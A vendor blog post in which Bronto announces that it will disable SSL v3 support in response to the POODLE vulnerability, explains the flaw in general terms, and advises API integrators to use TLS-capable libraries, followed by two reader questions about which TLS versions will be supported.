Bronto Response to POODLE Vulnerability

Damian Trzebunia

If you are a Bronto customer or partner using the Bronto API in any way, including self-built or pre-packaged integrations, please read this blog post and forward it to your API developer or integration provider for their awareness.

Please note that this blog post does not concern a vulnerability or bug in Bronto’s software. Bronto, being a software-as-a-service platform, relies on a host of internet protocols, and when a vulnerability is exposed in one of those protocols, it could impact the users of the Bronto Marketing Platform. This is simply our precautionary response to one such vulnerability to help minimize any risk to your Bronto account. Bronto’s software has not been compromised in any way.

What is POODLE?

POODLE (Padding Oracle On Downgraded Legacy Encryption) is a serious vulnerability in the SSL Version 3.0 protocol that can be exploited to steal certain confidential information, such as cookies. By exploiting this vulnerability, an attacker can gain access to things like passwords and cookies, enabling him to access a user’s private account data on a website.

POODLE is a design flaw in SSL/TLS, so there is no patch to fix the bug. Any website that supports SSL v3 is vulnerable to POODLE, even if it also supports more recent versions of TLS. As SSL Version 3.0 is no longer secure, Bronto must disable support for it to ensure Bronto customers use more modern security protocols to avoid compromising users’ private information.

Please see the CERT alert on POODLE for more information.

What is Bronto doing about POODLE?

On March 8, 2015, Bronto will disable support for SSL v3, the outdated protocol that is vulnerable to the POODLE bug. Most Bronto customers will not see any impact when SSL v3 is disabled on their Bronto website, since all currently supported browsers will automatically use newer and more secure versions of TLS. Most Bronto API integrations will also continue to work.

However, it is possible that this change may break API integrations for some customers because the SSL libraries they use either force the use of SSL v3 or don’t automatically upgrade to newer, better protocols.

What Must Bronto Customers Do?

Bronto customers should ensure their integrations use SSL libraries that support the newer versions of TLS and disable any further use of SSL v3 immediately.

If you have any specific questions or concerns, please reach out to  your Account Manager.

7 Responses to “Bronto Response to POODLE Vulnerability”

  1. Charles Fu

    Will Bronto be supporting TLS 1.0? Or will TLS 1.1 or TLS 1.2 be required?

    Reply
  2. Will you support TLS 1.0, or will you require TLS 1.1 or TLS 1.2? This is a very important detail to include, because 1.1 or 1.2 will require major upgrades (at least for us). Thanks!

    Reply

JOIN THE CONVERSATION

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">